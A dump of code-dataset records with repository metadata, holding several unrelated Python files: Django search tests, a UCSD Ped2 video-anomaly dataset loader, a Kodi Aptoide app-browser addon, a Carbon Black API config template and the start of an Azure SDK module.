def setUp(self):
self.url = reverse('search:index')
def test_template_used(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed("search/index.html")
def test_search(self):
response = self.client.get(self.url, {'q': 'serach'})
self.assertEqual(response.status_code, 200)
class SearchPageViewTest(TestCase):
def setUp(self):
self.url = reverse('search:pages')
def test_template_used(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed("search/index.html")
def test_search(self):
response = self.client.get(self.url, {'q': 'serach'})
self.assertEqual(response.status_code, 200)
| 28
| 61
| 0.670168
| 115
| 952
| 5.46087
| 0.286957
| 0.066879
| 0.101911
| 0.140127
| 0.802548
| 0.802548
| 0.802548
| 0.802548
| 0.675159
| 0.675159
| 0
| 0.017083
| 0.20063
| 952
| 33
| 62
| 28.848485
| 0.808147
| 0.022059
| 0
| 0.727273
| 0
| 0
| 0.077503
| 0
| 0
| 0
| 0
| 0
| 0.272727
| 1
| 0.272727
| false
| 0
| 0.090909
| 0
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22a577d15ada279ebe5e9bc0c5f6dd8f6ef7e022
| 14,831
|
py
|
Python
|
datasets/ucsd_ped2.py
|
NjuHaoZhang/AutoregressModel-AE_VAD_CVPR2019
|
b9843f34ecb59f908d78ddf977ee4670e0ed6cb4
|
[
"MIT"
] | 12
|
2020-08-24T08:03:51.000Z
|
2022-03-14T06:40:20.000Z
|
datasets/ucsd_ped2.py
|
zkeenly/AutoregressModel-AE_VAD_CVPR2019
|
b9843f34ecb59f908d78ddf977ee4670e0ed6cb4
|
[
"MIT"
] | null | null | null |
datasets/ucsd_ped2.py
|
zkeenly/AutoregressModel-AE_VAD_CVPR2019
|
b9843f34ecb59f908d78ddf977ee4670e0ed6cb4
|
[
"MIT"
] | 5
|
2020-10-10T10:28:19.000Z
|
2021-05-04T07:42:52.000Z
|
from glob import glob
from os.path import basename
from os.path import isdir
from os.path import join
from typing import List
from typing import Tuple
import numpy as np
import skimage.io as io
import torch
from skimage.transform import resize
from torchvision import transforms
from datasets.base import VideoAnomalyDetectionDataset
from datasets.transforms import ToCrops
from datasets.transforms import ToFloatTensor3D
from utils import concat_collate
# For Testing
# class UCSDPed2(VideoAnomalyDetectionDataset):
# pass
class UCSDPed2(VideoAnomalyDetectionDataset):
"""
Models UCSD Ped2 dataset for video anomaly detection.
"""
def __init__(self, path):
# type: (str) -> None
"""
Class constructor.
:param path: The folder in which UCSD is stored.
"""
super(UCSDPed2, self).__init__()
self.path = join(path, 'UCSDped2')
# Test directory
self.test_dir = join(self.path, 'Test')
# Transform
self.transform = transforms.Compose([ToFloatTensor3D(), ToCrops(self.raw_shape, self.crop_shape)])
# Load all test ids
self.test_ids = self.load_test_ids()
# Other utilities
self.cur_len = 0
self.cur_video_id = None
self.cur_video_frames = None
self.cur_video_gt = None
def load_test_ids(self):
# type: () -> List[str]
"""
Loads the set of all test video ids.
############################################################################################################
# By HaoZhang
# basename用于去掉目录的路径,只返回文件名: e.g. os.path.basename('d:\\library\\book.txt') => 'book.txt'
# glob(join(self.test_dir, '**'): 返回路径下{self.test_dir/'**'}的路径名,
*:匹配前一个表达式0次或多次。等价于 {0,}。
# 结合下面的if,本函数的功能:返回self.test_dir下所有目录名,但是除了带gt的,再根据UCSD Dataset 结构特点反推
# 这个是返回 UCSD_Anomaly_Dataset.v1p2/UCSDped2/Test 下面的所有 TestXXX(XXX:001~012) 目录名
############################################################################################################
:return: The list of test ids.
"""
return sorted([basename(d) for d in glob(join(self.test_dir, '**'))
if isdir(d) and 'gt' not in basename(d)])
def load_test_sequence_frames(self, video_id):
# type: (str) -> np.ndarray
"""
Loads a test video in memory.
:param video_id: the id of the test video to be loaded
:return: the video in a np.ndarray, with shape (n_frames, h, w, c).
"""
c, t, h, w = self.raw_shape
sequence_dir = join(self.test_dir, video_id)
# By HaoZhang, for UCSD/pde1 or ped2, video_id: TestXXX(XXX:001~012)
img_list = sorted(glob(join(sequence_dir, '*.tif'))) # 当前 vid下面所有tif
test_clip = []
for img_path in img_list: # 处理所有的 tif image ???
img = io.imread(img_path)
img = resize(img, output_shape=(h, w), preserve_range=True) # preserve_range : 是否保留原来的value范围
img = np.uint8(img)
test_clip.append(img) # list
test_clip = np.stack(test_clip) # 合并为更高一维的tensor, 把所有的frame都合并到一个大 tensor中,这种处理很棒
# 我之前的处理是,[start,end],仅仅合并16帧为一个clip,逐个获取 test clip 【分治处理所有的帧】
return test_clip # 所有帧构成的 4-D tensor: (n_frames, h, w, c),然后根据需要再提取部分 clip
# {这个做法很好},但存在一个隐患和一个待处理逻辑:一个隐患是将当前子目录所有图片全部读入内存,会不会内存爆炸
# 一个遗留问题:这个每次都要带上 video_id 才能获取到video_id的所有帧
def load_test_sequence_gt(self, video_id):
# type: (str) -> np.ndarray
"""
Loads the groundtruth of a test video in memory.
:param video_id: the id of the test video for which the groundtruth has to be loaded.
:return: the groundtruth of the video in a np.ndarray, with shape (n_frames,).
"""
sequence_dir = join(self.test_dir, f'{video_id}_gt')
# By HaoZhang, for UCSD/pde1 or ped2, video_id: TestXXX(XXX:001~012)
img_list = sorted(glob(join(sequence_dir, '*.bmp')))
clip_gt = []
for img_path in img_list:
img = io.imread(img_path) // 255 # 5 // 2 == 2.5
clip_gt.append(np.max(img)) # if at least one pixel is 1, then anomaly
clip_gt = np.stack(clip_gt)
return clip_gt
def test(self, video_id):
# type: (str) -> None
"""
Sets the dataset in test mode.
:param video_id: the id of the video to test.
"""
c, t, h, w = self.raw_shape
self.cur_video_id = video_id
self.cur_video_frames = self.load_test_sequence_frames(video_id)
self.cur_video_gt = self.load_test_sequence_gt(video_id)
self.cur_len = len(self.cur_video_frames) - t + 1 # # 不是vid下面所有帧构成的clip ?? 怎么求 len(clips)?
# 唯一答案: len(tensor) == tensor.size()[0] or tensor.shape[0]
# 另外,这个 cur_len 的算法核心是,举例: [1,2,3,4,5]以3为window_size,得到clips依次为:
# [1,2,3], [2,3,4], [3,4,5], 即 total_len - window_size + 1 (本例子中是:5 - 3 + 1 == 3)
@property
def shape(self):
# type: () -> Tuple[int, int, int, int]
"""
Returns the shape of examples being fed to the model.
"""
return self.crop_shape
@property
def raw_shape(self):
# type: () -> Tuple[int, int, int, int]
"""
Returns the shape of the raw examples (prior to patches).
"""
return 1, 16, 256, 384 # TODO:疑问,UCSD iamge 的原始大小是: 238x158x1, 那这里 raw_shape 是 ??
@property
def crop_shape(self):
# type: () -> Tuple[int, int, int, int]
"""
Returns the shape of examples (patches).
"""
return 1, 8, 32, 32 # TODO:这个 crop的物理过程到底是怎样?
@property
def test_videos(self):
# type: () -> List[str]
"""
Returns all available test videos.
"""
return self.test_ids
def __len__(self):
# type: () -> int
"""
Returns the number of examples.
"""
return int(self.cur_len)
def __getitem__(self, i):
# type: (int) -> Tuple[torch.Tensor, torch.Tensor]
"""
Provides the i-th example.
"""
c, t, h, w = self.raw_shape
clip = self.cur_video_frames[i:i+t] # 因为默认从第一个维度t 做切片slince
clip = np.expand_dims(clip, axis=-1) # add channel dimension, 为什么升维???TODO
sample = clip, clip # 重构模型 x->x
if self.transform:
sample = self.transform(sample)
return sample
@property
def collate_fn(self):
"""
Returns a function that decides how to merge a list of examples in a batch.
"""
return concat_collate
def __repr__(self):
return f'UCSD Ped2 (video id = {self.cur_video_id})'
# 测试的小代码段
def test_test_load_test_ids():
dataset = UCSDPed2(path='/home/zh/Papers_Code/CVPR2019_pytorch_VAD'
'/novelty-detection/data/UCSD_Anomaly_Dataset.v1p2')
print("self.test_ids: ", dataset.test_ids)
res = dataset.load_test_ids()
print("test_load_test_ids,res: ", res)
#####################################################################################
# For Training by HaoZhang
class UCSDPed2_TRAIN(VideoAnomalyDetectionDataset):
"""
Models UCSD Ped2 dataset for video anomaly detection.
"""
def __init__(self, path):
# type: (str) -> None
"""
Class constructor.
:param path: The folder in which UCSD is stored.
"""
super(UCSDPed2_TRAIN, self).__init__()
self.path = join(path, 'UCSDped2') # 这个path通用于 Train or Test
# Train directory
self.train_dir = join(self.path, 'Train')
# Transform
# TODO: Training还需要其他的Data Augmentation 吗? 问下论文作者!
self.transform = transforms.Compose([ToFloatTensor3D(), ToCrops(self.raw_shape, self.crop_shape)])
# Load all train ids
self.train_ids = self.load_train_ids()
# Other utilities
self.cur_len = 0
self.cur_video_id = None # Train 下面的所有 TrainXXX(XXX:001~016) 目录名
self.cur_video_frames = None
# self.cur_video_gt = None
def load_train_ids(self):
# type: () -> List[str]
"""
Loads the set of all test video ids.
############################################################################################################
# By HaoZhang
# basename用于去掉目录的路径,只返回文件名: e.g. os.path.basename('d:\\library\\book.txt') => 'book.txt'
# glob(join(self.test_dir, '**'): 返回路径下{self.test_dir/'**'}的路径名,
*:匹配前一个表达式0次或多次。等价于 {0,}。
# 结合下面的if,本函数的功能:返回self.test_dir下所有目录名,但是除了带gt的,再根据UCSD Dataset 结构特点反推
# 这个是返回 UCSD_Anomaly_Dataset.v1p2/UCSDped2/Train 下面的所有 TrainXXX(XXX:001~016) 目录名
############################################################################################################
:return: The list of test ids.
"""
return sorted([basename(d) for d in glob(join(self.train_dir, '**')) if isdir(d)])
def load_train_sequence_frames(self, video_id):
# type: (str) -> np.ndarray
"""
Loads a test video in memory.
:param video_id: the id of the test video to be loaded
:return: the video in a np.ndarray, with shape (n_frames, h, w, c).
"""
c, t, h, w = self.raw_shape
sequence_dir = join(self.train_dir, video_id)
# By HaoZhang, for UCSD/pde1 or ped2, video_id: TrainXXX(XXX:001~016)
img_list = sorted(glob(join(sequence_dir, '*.tif'))) # 当前 vid下面所有tif
train_clip = []
for img_path in img_list: # 处理所有的 tif image ??? 对的
img = io.imread(img_path)
img = resize(img, output_shape=(h, w), preserve_range=True) # preserve_range : 是否保留原来的value范围
img = np.uint8(img)
train_clip.append(img) # list
train_clip = np.stack(train_clip) # 合并为更高一维的tensor, 把所有的frame都合并到一个大 tensor中,这种处理很棒
# 我之前的处理是,[start,end],仅仅合并16帧为一个clip,逐个获取 test clip 【分治处理所有的帧】
return train_clip # 所有帧构成的 4-D tensor: (n_frames, h, w, c),然后根据需要再提取部分 clip
# {这个做法很好},但存在一个隐患和一个待处理逻辑:一个隐患是将当前子目录所有图片全部读入内存,会不会内存爆炸
# 一个遗留问题:这个每次都要带上 video_id 才能获取到video_id的所有帧
# def load_test_sequence_gt(self, video_id):
# # type: (str) -> np.ndarray
# """
# Loads the groundtruth of a test video in memory.
#
# :param video_id: the id of the test video for which the groundtruth has to be loaded.
# :return: the groundtruth of the video in a np.ndarray, with shape (n_frames,).
# """
# sequence_dir = join(self.test_dir, f'{video_id}_gt')
# # By HaoZhang, for UCSD/pde1 or ped2, video_id: TestXXX(XXX:001~012)
# img_list = sorted(glob(join(sequence_dir, '*.bmp')))
# clip_gt = []
# for img_path in img_list:
# img = io.imread(img_path) // 255 # 5 // 2 == 2.5
# clip_gt.append(np.max(img)) # if at least one pixel is 1, then anomaly
# clip_gt = np.stack(clip_gt)
# return clip_gt
def train(self, video_id):
# type: (str) -> None
"""
Sets the dataset in test mode.
:param video_id: the id of the video to test.
"""
c, t, h, w = self.raw_shape # 默认clip_len为16
self.cur_video_id = video_id
self.cur_video_frames = self.load_train_sequence_frames(video_id)
# self.cur_video_gt = self.load_test_sequence_gt(video_id)
self.cur_len = len(self.cur_video_frames) - t + 1 # # 不是vid下面所有帧构成的clip ?? 怎么求 len(clips)?
# 唯一答案: len(tensor) == tensor.size()[0] or tensor.shape[0]
# 经过代码测试,我的上述猜想正确
# 另外,这个 cur_len 的算法核心是,举例: [1,2,3,4,5]以3为window_size,得到clips依次为:
# [1,2,3], [2,3,4], [3,4,5], 即 total_len - window_size + 1 (本例子中是:5 - 3 + 1 == 3)
@property
def shape(self):
# type: () -> Tuple[int, int, int, int]
"""
Returns the shape of examples being fed to the model.
"""
return self.crop_shape
@property
def raw_shape(self):
# type: () -> Tuple[int, int, int, int]
"""
Returns the shape of the raw examples (prior to patches).
"""
return 1, 16, 256, 384 # TODO:疑问,UCSD iamge 的原始大小是: 238x158x1, 那这里 raw_shape 是 ??
@property
def crop_shape(self):
# type: () -> Tuple[int, int, int, int]
"""
Returns the shape of examples (patches).
"""
return 1, 8, 32, 32 # TODO:这个 crop的物理过程到底是怎样?8是什么意思?
@property
def train_videos(self):
# type: () -> List[str]
"""
Returns all available test videos.
"""
return self.train_ids
def __len__(self):
# type: () -> int
"""
Returns the number of examples.
"""
return int(self.cur_len)
def __getitem__(self, i):
# type: (int) -> Tuple[torch.Tensor, torch.Tensor]
"""
Provides the i-th example.
"""
c, t, h, w = self.raw_shape
clip = self.cur_video_frames[i:i + t] # 因为默认从第一个维度t 做切片slince
clip = np.expand_dims(clip, axis=-1) # add channel dimension, 为什么升维???TODO
sample = clip, clip # 重构模型 x->x
if self.transform:
sample = self.transform(sample)
return sample
@property
def collate_fn(self):
"""
Returns a function that decides how to merge a list of examples in a batch.
"""
return concat_collate
def __repr__(self):
return f'UCSD Ped2 (video id = {self.cur_video_id})'
# by HaoZhang
# 发现测试不了,应该是代码结构的问题
# 不是,其实是环境包依赖问题,花点时间逐个解决就OK了
def test_TRAIN():
dataset = UCSDPed2_TRAIN(path='/home/zh/Papers_Code/CVPR2019_pytorch_VAD'
'/novelty-detection/data/UCSD_Anomaly_Dataset.v1p2')
print("self.train_dir: ", dataset.train_dir)
ids = dataset.load_train_ids()
print("ids: ", ids) # Trainxxx (001~016)
#
clip = dataset.load_train_sequence_frames("Train001")
print("clip.shape: ", clip.shape) # (120, 256, 384)
#
dataset.train("Train001")
print("Train001的cur_len", dataset.cur_len) # 理想是120-16+1 = 105
# 实际是:105,逻辑正确
#
clip_0 = dataset[0]
print("clip_0的shape: ", clip_0[0].shape, clip_0[1].shape)
# 没有加入self.transform,是这样的:(16, 256, 384, 1) (16, 256, 384, 1)
# 加入 self.transform,这样的:torch.Size([690, 1, 8, 32, 32]) torch.Size([690, 1, 8, 32, 32])
# TODO 本论文的transform看来有必要认真读下!!!
#
####################################################################################
if __name__ == '__main__':
##########################################################
# for Testing set
# test_test_load_test_ids()
##########################################################
# for Training
test_TRAIN()
| 35.480861
| 116
| 0.569483
| 1,880
| 14,831
| 4.327128
| 0.156383
| 0.030977
| 0.026552
| 0.017701
| 0.802459
| 0.796435
| 0.795943
| 0.776644
| 0.776644
| 0.776644
| 0
| 0.026598
| 0.269908
| 14,831
| 417
| 117
| 35.565947
| 0.724695
| 0.450273
| 0
| 0.522013
| 0
| 0
| 0.064521
| 0.029171
| 0
| 0
| 0
| 0.019185
| 0
| 1
| 0.169811
| false
| 0
| 0.09434
| 0.012579
| 0.408805
| 0.044025
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22b91bb83edf52fba90fa608adc6893df56d5d90
| 979
|
py
|
Python
|
user/vistas/widgets/subFooter.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
user/vistas/widgets/subFooter.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
user/vistas/widgets/subFooter.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
doc+='''<section class="well3"> <div class="container"> <ul class="row contact-list"> <li class="grid_4"> '''
try: doc+=str(incluir(data,"box-info"))
except Exception, e: doc+=str(e)
doc+=''' '''
try: doc+=str(incluir(data,"box-info"))
except Exception, e: doc+=str(e)
doc+=''' </li> <li class="grid_4"> '''
try: doc+=str(incluir(data,"box-info"))
except Exception, e: doc+=str(e)
doc+=''' '''
try: doc+=str(incluir(data,"box-info"))
except Exception, e: doc+=str(e)
doc+=''' </li> <li class="grid_4"> '''
try: doc+=str(incluir(data,"box-info"))
except Exception, e: doc+=str(e)
doc+=''' '''
try: doc+=str(incluir(data,"box-info"))
except Exception, e: doc+=str(e)
doc+=''' </li> </ul> </div> </section>'''
| 46.619048
| 157
| 0.46476
| 120
| 979
| 3.766667
| 0.233333
| 0.159292
| 0.119469
| 0.212389
| 0.79646
| 0.79646
| 0.79646
| 0.79646
| 0.79646
| 0.79646
| 0
| 0.007396
| 0.309499
| 979
| 21
| 158
| 46.619048
| 0.661243
| 0.038815
| 0
| 0.894737
| 0
| 0.052632
| 0.493617
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fe0a8b1602b4b75375a88a00701deb6fec635fb5
| 6,145
|
py
|
Python
|
plugin.program.aptoide/resources/lib/api/aptoide.py
|
akuala/REPO.KUALA
|
ea9a157025530d2ce8fa0d88431c46c5352e89d4
|
[
"Apache-2.0"
] | 2
|
2018-11-02T19:55:30.000Z
|
2020-08-14T02:22:20.000Z
|
plugin.program.aptoide/resources/lib/api/aptoide.py
|
akuala/REPO.KUALA
|
ea9a157025530d2ce8fa0d88431c46c5352e89d4
|
[
"Apache-2.0"
] | null | null | null |
plugin.program.aptoide/resources/lib/api/aptoide.py
|
akuala/REPO.KUALA
|
ea9a157025530d2ce8fa0d88431c46c5352e89d4
|
[
"Apache-2.0"
] | 3
|
2019-12-17T20:47:00.000Z
|
2021-02-11T19:03:59.000Z
|
from resources.lib.modules import control, cleantitle
import requests
import os,sys,re,json,urllib,urlparse,json
import xbmc, xbmcaddon, xbmcgui, xbmcvfs
params = dict(urlparse.parse_qsl(sys.argv[2].replace('?','')))
action = params.get('action')
sysaddon = sys.argv[0]
syshandle = int(sys.argv[1])
addonInfo = xbmcaddon.Addon().getAddonInfo
profilePath = xbmc.translatePath(addonInfo('profile')).decode('utf-8')
aptoide_API = 'https://ws75.aptoide.com/api/7'
appMeta = '/app/getMeta/app_id='
popular_apps = '/apps/get/sort=downloads/limit=100/offset='
group_apps = '/apps/get/limit=100/sort=downloads/group_name='
icon = control.icon
fanart = control.fanart
def getPopulars(offset=None):
if offset == None: offset = '0'
link = popular_apps + offset
url = aptoide_API + link
r = requests.get(url).json()
r = r['datalist']['list']
for item in r:
name = item['name'].encode('utf-8')
name = cleantitle.normalize(name)
id = item['id']
downloads = item['stats']['downloads']
icon = item['icon']
fanart = item['graphic']
version = item['file']['vername'].encode('utf-8')
label = name + " [" + version + "]"
item = control.item(label=label)
isFolder = False
item.setArt({'icon': icon, 'thumb': icon})
if fanart == '' or fanart == None: fanart = control.fanart
item.setProperty('Fanart_Image', fanart)
description = 'DOWNLOADS: ' + str(downloads)
meta = {'plot': description}
meta.update({'Title': label})
sysname = cleantitle.geturl(name)
item.setInfo( type="Video", infoLabels= meta )
url = '%s?action=%s&id=%s&title=%s' % (sysaddon, 'AppSelect', id, sysname)
control.addItem(handle=syshandle, url=url, listitem=item, isFolder=isFolder)
control.directory(syshandle, cacheToDisc=False)
def AppSelect(title, id):
type = ['Download App', 'Install App']
select = control.selectDialog(type)
if select == 0: downloadApp(title, id)
elif select == 1: installApp(title, id)
else: return
def downloadApp(title, id):
link = appMeta + id
url = aptoide_API + link
r = requests.get(url).json()
path = r['data']['file']['path']
title = title + ".apk"
from resources.lib.modules import downloader
loc = control.setting('download.path')
downloader.downloadAPK(title, path)
def installApp(title, id):
link = appMeta + id
url = aptoide_API + link
r = requests.get(url).json()
path = r['data']['file']['path']
title = title + ".apk"
from resources.lib.modules import downloader
loc = control.setting('download.path')
downloader.installAPK(title, path)
def searchApp():
k = control.keyboard('', 'Search APP') ; k.doModal()
q = k.getText() if k.isConfirmed() else None
if (q == None or q == ''): return
query = '/apps/search/query=%s/limit=50' % q
url = aptoide_API + query
getAppsUrl(url)
def getAppsUrl(url):
r = requests.get(url).json()
r = r['datalist']['list']
for item in r:
name = item['name'].encode('utf-8')
name = cleantitle.normalize(name)
id = item['id']
downloads = item['stats']['downloads']
icon = item['icon']
fanart = item['graphic']
version = item['file']['vername'].encode('utf-8')
label = name + " [" + version + "]"
item = control.item(label=label)
isFolder = False
item.setArt({'icon': icon, 'thumb': icon})
if fanart == '' or fanart == None: fanart = control.fanart
item.setProperty('Fanart_Image', fanart)
description = 'DOWNLOADS: ' + str(downloads)
meta = {'plot': description}
meta.update({'Title': label})
sysname = cleantitle.geturl(name)
item.setInfo( type="Video", infoLabels= meta )
url = '%s?action=%s&id=%s&title=%s' % (sysaddon, 'AppSelect', id, sysname)
control.addItem(handle=syshandle, url=url, listitem=item, isFolder=isFolder)
control.directory(syshandle, cacheToDisc=False)
def getStore(name):
link = group_apps + name
url = aptoide_API + link
r = requests.get(url).json()
r = r['datalist']['list']
for item in r:
name = item['name'].encode('utf-8')
name = cleantitle.normalize(name)
id = item['id']
downloads = item['stats']['downloads']
icon = item['icon']
fanart = item['graphic']
if fanart == '' or fanart == None: fanart = control.fanart
version = item['file']['vername'].encode('utf-8')
label = name + " [" + version + "]"
item = control.item(label=label)
isFolder = False
item.setArt({'icon': icon, 'thumb': icon})
item.setProperty('Fanart_Image', fanart)
description = 'DOWNLOADS: ' + str(downloads)
meta = {'plot': description}
meta.update({'Title': label})
item.setInfo( type="Video", infoLabels= meta )
sysname = cleantitle.geturl(name)
url = '%s?action=%s&id=%s&title=%s' % (sysaddon, 'AppSelect', id, sysname)
control.addItem(handle=syshandle, url=url, listitem=item, isFolder=isFolder)
control.directory(syshandle, cacheToDisc=False)
def getGames(offset=None):
if offset == None: offset = '0'
link = '/store/groups/get/store_name=apps/group_name=games'
url = aptoide_API + link
r = requests.get(url).json()
r = r['datalist']['list']
for item in r:
name = item['name'].encode('utf-8')
id = item['id']
id = str(id)
label = name
item = control.item(label=label)
isFolder = True
item.setArt({'icon': icon, 'thumb': icon})
item.setProperty('Fanart_Image', fanart)
url = '%s?action=%s&id=%s' % (sysaddon, 'getStore', name)
control.addItem(handle=syshandle, url=url, listitem=item, isFolder=isFolder)
control.directory(syshandle, cacheToDisc=False)
def getApplications(offset=None):
if offset == None: offset = '0'
link = '/store/groups/get/store_name=apps/group_name=applications'
url = aptoide_API + link
r = requests.get(url).json()
r = r['datalist']['list']
for item in r:
name = item['name'].encode('utf-8')
id = item['id']
id = str(id)
label = name
item = control.item(label=label)
isFolder = True
item.setArt({'icon': icon, 'thumb': icon})
item.setProperty('Fanart_Image', fanart)
url = '%s?action=%s&id=%s' % (sysaddon, 'getStore', name)
control.addItem(handle=syshandle, url=url, listitem=item, isFolder=isFolder)
control.directory(syshandle, cacheToDisc=False)
| 32.172775
| 78
| 0.663792
| 811
| 6,145
| 5
| 0.177559
| 0.008878
| 0.019729
| 0.025894
| 0.762762
| 0.75561
| 0.747226
| 0.747226
| 0.72947
| 0.72947
| 0
| 0.005428
| 0.160618
| 6,145
| 190
| 79
| 32.342105
| 0.780729
| 0
| 0
| 0.742331
| 0
| 0
| 0.158691
| 0.049805
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.03681
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a4de57dace39dbf6c0b9050d623e6b87e9b5fe8
| 632
|
py
|
Python
|
threat_hunting/CB-Command_R/config.py
|
knightsc/tau-tools
|
7782383c162bc2642ecdcbc75e8a19cbdfd298e9
|
[
"MIT"
] | 202
|
2018-11-28T20:31:21.000Z
|
2022-03-11T08:09:03.000Z
|
threat_hunting/CB-Command_R/config.py
|
knightsc/tau-tools
|
7782383c162bc2642ecdcbc75e8a19cbdfd298e9
|
[
"MIT"
] | 7
|
2018-11-30T08:42:31.000Z
|
2020-10-14T23:40:31.000Z
|
threat_hunting/CB-Command_R/config.py
|
knightsc/tau-tools
|
7782383c162bc2642ecdcbc75e8a19cbdfd298e9
|
[
"MIT"
] | 76
|
2018-11-28T20:31:23.000Z
|
2021-12-15T06:03:21.000Z
|
#!/usr/bin/env python
active = {
'url': 'https://<SUBDOMAIN>.carbonblack.io/api/v1/process',
'key': '<API KEY>'
}
# ======================================================================
# Place API key and URL in 'active' to use with the cmdline-search.py
# ======================================================================
env1 = {
'url': 'https://<SUBDOMAIN>.carbonblack.io/api/v1/process',
'key': '<API KEY>'
}
env2 = {
'url': 'https://<SUBDOMAIN>.carbonblack.io/api/v1/process',
'key': '<API KEY>'
}
etc = {
'url': 'https://<SUBDOMAIN>.carbonblack.io/api/v1/process',
'key': '<API KEY>'
}
| 25.28
| 72
| 0.455696
| 66
| 632
| 4.363636
| 0.409091
| 0.104167
| 0.236111
| 0.388889
| 0.708333
| 0.708333
| 0.708333
| 0.708333
| 0.708333
| 0.708333
| 0
| 0.011029
| 0.139241
| 632
| 25
| 73
| 25.28
| 0.518382
| 0.363924
| 0
| 0.5
| 0
| 0
| 0.641604
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4a4ff642c2571f6247fdf4cd7cc4a8a8f3e7e643
| 171
|
py
|
Python
|
backend/notes/getDateTime.py
|
MUCCHU/notefy
|
711febd361c7a00b05e4e5bf191a52101b6dbbd6
|
[
"MIT"
] | null | null | null |
backend/notes/getDateTime.py
|
MUCCHU/notefy
|
711febd361c7a00b05e4e5bf191a52101b6dbbd6
|
[
"MIT"
] | null | null | null |
backend/notes/getDateTime.py
|
MUCCHU/notefy
|
711febd361c7a00b05e4e5bf191a52101b6dbbd6
|
[
"MIT"
] | null | null | null |
def giveMeDateTime(date_time):
split_date = date_time.split("T")
return (split_date[0] + " " + split_date[1].split(":")[0] + ":" + split_date[1].split(":")[1])
| 42.75
| 98
| 0.596491
| 24
| 171
| 4
| 0.375
| 0.375
| 0.270833
| 0.229167
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034722
| 0.157895
| 171
| 4
| 98
| 42.75
| 0.631944
| 0
| 0
| 0
| 0
| 0
| 0.029586
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
4a6fccf9f856ca23a3af4a41603bdf8a23e2b3f7
| 96,286
|
py
|
Python
|
sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2020_09_01/aio/operations/_static_sites_operations.py
|
beltr0n/azure-sdk-for-python
|
2f7fb8bee881b0fc0386a0ad5385755ceedd0453
|
[
"MIT"
] | 2
|
2021-03-24T06:26:11.000Z
|
2021-04-18T15:55:59.000Z
|
sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2020_09_01/aio/operations/_static_sites_operations.py
|
beltr0n/azure-sdk-for-python
|
2f7fb8bee881b0fc0386a0ad5385755ceedd0453
|
[
"MIT"
] | 4
|
2019-04-17T17:57:49.000Z
|
2020-04-24T21:11:22.000Z
|
sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2020_09_01/aio/operations/_static_sites_operations.py
|
beltr0n/azure-sdk-for-python
|
2f7fb8bee881b0fc0386a0ad5385755ceedd0453
|
[
"MIT"
] | 2
|
2021-05-23T16:46:31.000Z
|
2021-05-26T23:51:09.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class StaticSitesOperations:
"""StaticSitesOperations async operations.
